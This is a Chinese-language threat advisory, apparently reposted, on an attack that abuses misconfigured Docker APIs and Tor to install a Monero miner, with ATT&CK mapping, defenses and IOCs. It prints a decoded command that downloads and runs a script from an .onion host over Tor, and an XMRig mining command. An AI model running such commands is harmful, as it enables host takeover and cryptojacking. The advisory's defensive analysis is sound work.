揭露利用Tor网络的Docker漏洞攻击链
关键发现
- 新型攻击结合Docker远程API与Tor匿名网络,在受害系统隐秘部署加密货币挖矿程序
- 攻击者利用配置不当的Docker API获取容器环境访问权限,通过Tor隐藏活动痕迹
- 主要攻击目标为云计算密集型行业:科技公司、金融服务机构和医疗组织
- 攻击工具链包含zstd压缩工具(基于ZStandard算法,以高压缩比和快速解压著称)
攻击流程分析
初始访问阶段
攻击始于对Docker Remote API的探测请求(源IP: 198[.]199[.]72[.]27),随后攻击者创建挂载宿主机根目录的Alpine容器,通过base64编码隐藏恶意命令:
# 解码后的攻击命令
sh -c curl --socks5-hostname tor:9050 -o /docker-init.sh http[:]//xxx.onion/static/docker-init.sh && chmod +x /docker-init.sh && /docker-init.sh
恶意脚本功能
-
SSH后门配置
- 修改宿主机SSH配置允许root登录
- 植入攻击者公钥实现持久化访问
-
工具安装
- 部署masscan端口扫描工具
- 安装zstd压缩工具和torsocks代理工具
-
C2通信
- 通过.onion域名向攻击者C2服务器回传系统信息
-
有效载荷投递
- 通过Tor网络下载Zstandard压缩的恶意二进制文件(system-linux-$(uname -m).zst)
挖矿程序部署
最终执行的XMRig矿工包含完整配置:
./system -o pool.moneroocean.stream:10128 -u 49... -p x -a rx/0
MITRE ATT&CK技术映射
战术阶段 | 技术点 | ID |
---|---|---|
初始访问 | 利用公开应用漏洞 | T1190 |
防御规避 | 文件混淆(Zstd压缩) | T1027.015 |
命令与控制 | 多跳代理(Tor) | T1090.003 |
防御建议
- 严格配置Docker API访问权限,仅允许可信网络访问
- 容器运行时禁止使用root权限
- 定期审计容器镜像及运行实例
- 启用Trend Vision One:trade_mark:威胁检测功能(提供相关IOC狩猎查询)
威胁指标(IOC)
SHA256 | 文件名称 | 检测名称 |
---|---|---|
1bb95a02f1c12... | pkg-updater | Coinminer.Linux.MALXMR.SMDSL64 |
http[:]//xxx.onion/static/docker-init.sh | 恶意脚本下载URL |
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
公众号二维码